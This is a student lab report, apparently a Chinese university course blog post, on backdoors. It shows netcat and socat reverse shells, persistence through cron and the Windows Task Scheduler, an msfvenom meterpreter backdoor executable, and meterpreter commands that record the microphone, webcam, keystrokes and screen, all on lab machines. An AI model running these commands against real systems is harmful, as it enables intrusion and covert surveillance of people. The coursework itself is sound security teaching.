2019-2020-2《网络对抗技术》20175235 Exp2 后门原理与实践

20175235 《网络对抗技术》实验二 后门原理与实践


20175235泽仁拉措

目录:

(1)使用netcat获取主机操作Shell,cron启动

(2)使用socat获取主机操作Shell, 任务计划启动

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)基础问题回答及实验心得

1.基础知识总结
  (1)后门:是不经过正常认证流程而访问系统流程的通道。

  (2)常见后门有:编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。

  (3)布置后门的流程:一个后门程序;将其放置在系统里;使后门程序代码运行起来;不被查杀软件查杀且不被防火墙发现。(常用技术有:反弹式连接;加密技术;隧道技术)。

  (4)常用后门工具:netcat:又名nc、ncat;Linux:自带netcat,输入man nc查看其使用说明;Windows: 下载ncat.rar工具包。
一、Win获得Linux Shell
先下载ncatsocat到主机,将其解压到主机,在主机的cmd输入ip
①首先在Windows中使用 ipconfig 查看主机IP地址

②在cmd进入ncat所在的文件夹,输入命令ncat.exe -l -p 8888并运行
③在linux终端中输入nc 192.168.153.1 8888 -e /bin/sh:

④此时Win已经获得Linux Shell,如图所示:

二、Linux获得Win Shell
①在linux终端中输入ifconfig查看ip

②输入nc -l -p 8888使其处于监听状态
③.在主机的cmd还是打开之前的ncat文件夹,输入ncat.exe -e cmd.exe192.168.153.128 8888
再看linux已经出现了win的命令提示:


实验内容

一、使用netcat获取主机操作Shell,cron启动
1.crontab -e指令增加一条定时任务,-e表示编辑。

2.在最后一行添加1 * * * * /bin/netcat 192.168.153.1 8888 -e /bin/sh

3.当时间到了,此时已经获得了Kali的shell,可以输入指令ls


返回

二、使用socat获取主机操作Shell, 任务计划启动
1.在主机中找到控制面板-系统与安全-管理工具-任务计划程序,选择创建任务

2.选择新建触发器,设置相应触发的时间

3.在操作中选择每次需要执行的程序或脚本

4.看到任务的状态为准备就绪

5.此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口

6.在kali中输入指令socat - tcp:192.168.:8888

此时可以发现已经成功获得了一个shell,下图为输入dir的结果


back

三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在kali中生成后门程序meter_backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.40.132 LPORT=5311 -f exe > meter_backdoor.exe

2.将后门程序拷贝到Win10中,在kali中打开MSF监听程序msfconsole

依次输入use exploit/multi/handler,set payload windows/meterpreter/reverse_tcp,set LHOST 192.168.153.128,set LPORT8888等命令进行配置。

3.在win10中打开meter_backdoor.exe后门程序。

在kali中输入exploit就能得到入侵成功的结果。

返回

四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic指令可以截获一段音频

2.使用webcam_snap指令可以使用摄像头进行拍照


3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

4.使用screenshot指令可以进行截屏

返回

五、基础问题回答及实验心得
1.基础问题回答
  (1)例举你能想到的一个后门进入到你系统中的可能方式?
  答:从网上下载的软件包有恶意代码且躲过了查杀,我的系统就有可能被植入了后门。

  (2)例举你知道的后门如何启动起来(win及linux)的方式?
    答:1.开机自启动技术;

     2.windows定时任务;

     3.木马化正常软件。

  (3)Meterpreter有哪些给你映像深刻的功能?
  答:Meterpreter是一个后门平台,用`webcam_snap`指令可以使用摄像头进行拍照,让我很惊恐

  (4)如何发现自己有系统有没有被安装后门?
  答:查看注册表、进程、端口情况,使用杀毒软件进行查杀。
2.实验问题与体会
  ①.后门程序无法运行 ;解决方法:重新复制一遍后门程序即可

  ②.linux:查ip 出现:bash:ifconfig;未找到指令
   解决方法:输入指令`whereis ifconfig``echo $PATH``export PATH=$PATH:/sbin`再输入`ifconfig`就可以了
    这次实验前面刚做我还没什么概念。后面做到使用摄像头进行拍照,我才意识到后门是多么恐怖,一不小心就可能让人探了隐私,真的就是细思极恐。也感想这次实验让我学到了很多,以后下载软件,登录网址一定要尽量小心。
原文地址:https://www.cnblogs.com/Zrlc/p/12541193.html